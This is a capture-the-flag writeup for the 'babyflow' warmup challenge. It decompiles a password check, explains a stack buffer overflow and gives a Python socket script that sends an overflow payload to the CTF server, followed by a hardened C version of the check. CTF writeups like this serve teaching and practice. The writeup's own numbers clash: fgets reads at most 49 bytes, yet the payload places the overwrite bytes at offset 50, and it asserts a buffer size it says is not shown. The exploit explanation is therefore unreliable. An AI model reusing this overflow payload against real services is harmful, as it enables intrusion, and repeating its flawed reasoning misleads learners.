# Warmup - Babyflow

## Challenge

<figure><img src="/files/OadXvljT5KR1lnm3tCbj" alt="" width="375"><figcaption></figcaption></figure>

## Warmup PWN Challenge: babyflow Writeup

In this writeup, we walk through the "Warmup" PWN challenge (babyflow) step by step. The goal is to exploit a buffer overflow so that, once the password check has been passed, the local variable that gates the flag is overwritten and the flag is printed.

### Step 1: Analyzing the Binary

We start by loading the binary in Binary Ninja and decompiling it.

<figure><img src="/files/ZCNOLlhT2NzPqXuu6wIu" alt="" width="563"><figcaption></figcaption></figure>

The decompiled `main` looks like this:

```c
int32_t main(int32_t argc, char** argv, char** envp)
{
    int32_t var_c = 0;                      // the variable that gates the flag
    printf("Enter password: ");
    fgets(&buf, 50, stdin);                 // reads at most 49 bytes into buf (buf's own size is not shown here)

    if (strncmp(&buf, "SuPeRsEcUrEPaSsWoRd123", 22) != 0)   // compares only the first 22 bytes
        puts("Incorrect Password!");
    else
        puts("Correct Password!");

    if (var_c == 0)                         // checked whether or not the password matched
        puts("Are you sure you are admin? o.O");
    else
        puts("INTIGRITI{the_flag_is_different_…}");

    return 0;
}
```

#### Trying the password

<figure><img src="/files/gU9BuOhbiyahIjQwsTEo" alt=""><figcaption></figcaption></figure>

#### Key Points

* The program asks for a password input and checks it using `strncmp` against the hardcoded string `"SuPeRsEcUrEPaSsWoRd123"`.
* After the comparison, the program checks the value of `var_c`; in the decompiled code this check runs whether or not the password matched.
  * If `var_c` is still `0`, it prints a message asking whether you are the admin.
  * If `var_c` is non-zero, it prints the flag.

### Step 2: Crafting the Exploit

We need to:

1. Input the correct password to pass the check.
2. Overflow the buffer to modify `var_c` and set it to a non-zero value, which will reveal the flag.

**Buffer Overflow:**

* The buffer size is 50 bytes, and the password takes up the first 22 bytes.
* That leaves 28 bytes for padding and overflow. Because `strncmp` compares only the first 22 bytes, the padding does not affect the password check.
* We need to overflow into `var_c` (a 4-byte integer) and set it to `1`; since the program only tests `var_c == 0`, any non-zero value would do.

### Step 3: Writing the Python Exploit

Now, let's write a Python script to send the payload to the server.

```python
import socket

# Connect to the remote server
host = 'babyflow.ctf.intigriti.io'
port = 1331

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))

# Receive and print the initial message
response = s.recv(1024).decode('utf-8')
print(response)

# Prepare the exploit payload
password = "SuPeRsEcUrEPaSsWoRd123"
padding = "A" * (50 - len(password))  # Fill the buffer space
overflow_payload = padding + "\x01\x00\x00\x00"  # Overwrite var_c with 1

# Send the payload
s.sendall((password + overflow_payload + "\n").encode('utf-8'))

# Receive and print the flag
response = s.recv(1024).decode('utf-8')
print(response)

# Close the connection
s.close()
```

### Step 4: Running the Exploit

Once the script is ready, run it with:

```bash
python babyflow.py
```

If the exploit is successful, the program will print the flag:

<figure><img src="/files/RwI0iJc7lHvya4wS95z9" alt=""><figcaption></figcaption></figure>

### Conclusion

This challenge demonstrates a classic buffer overflow. We pass the password check by entering the correct password, then overflow the buffer to overwrite a local variable (`var_c`). When `var_c` is changed from `0` to `1`, the program prints the flag.

By following these steps, we successfully exploited the vulnerability and obtained the flag. This writeup covers the basic principles of exploiting buffer overflows in C programs and how to automate the process using Python.
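As an added example (not the challenge binary's code and not part of the original writeup), here is the same check written two ways: the prefix-only `strncmp` comparison seen in the decompiled `main`, beside a hardened version that sizes the `fgets` call from the buffer itself, refuses lines that did not fit, and compares the whole line. The 32-byte buffer, the function names and the use of `tmpfile` to stand in for `stdin` are assumptions made for the demonstration.

```c
#include <stdio.h>
#include <string.h>
#define PASSWORD "SuPeRsEcUrEPaSsWoRd123"

/* Mirrors the decompiled check: strncmp with n = 22 compares only the
 * prefix, so any line that starts with the password is accepted. */
int prefix_check(const char *input)
{
    return strncmp(input, PASSWORD, 22) == 0;
}

/* Hardened check: compare the whole line, so trailing bytes are rejected. */
int strict_check(const char *input)
{
    return strcmp(input, PASSWORD) == 0;
}

/* Hardened read: the fgets limit is the destination's real size (sizeof at the
 * call site), the newline is stripped, and a line that did not fit is refused
 * instead of being half-accepted.  Returns 1 on success, 0 otherwise. */
int read_line(char *buf, size_t size, FILE *in)
{
    if (fgets(buf, (int)size, in) == NULL)
        return 0;
    size_t len = strcspn(buf, "\n");
    if (buf[len] != '\n' && !feof(in))
        return 0;                    /* input longer than the buffer */
    buf[len] = '\0';
    return 1;
}

/* Run one in-memory line through the hardened path; 1 = accepted as the password. */
int accept_from_string(const char *line)
{
    char buf[32];                    /* assumed size for the demonstration */
    FILE *in = tmpfile();            /* standard C; stands in for stdin here */
    if (in == NULL || fputs(line, in) == EOF)
        return 0;
    rewind(in);
    int ok = read_line(buf, sizeof buf, in) && strict_check(buf);
    fclose(in);
    return ok;
}

int main(void)
{
    char buf[32];
    printf("Enter password: ");
    puts(read_line(buf, sizeof buf, stdin) && strict_check(buf)
             ? "Correct Password!" : "Incorrect Password!");
    return 0;
}
```

With the hardened read, the 50-character payload from the exploit above is rejected outright because it does not fit in the buffer, and `strict_check` rejects any padded input that `prefix_check` would have accepted.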
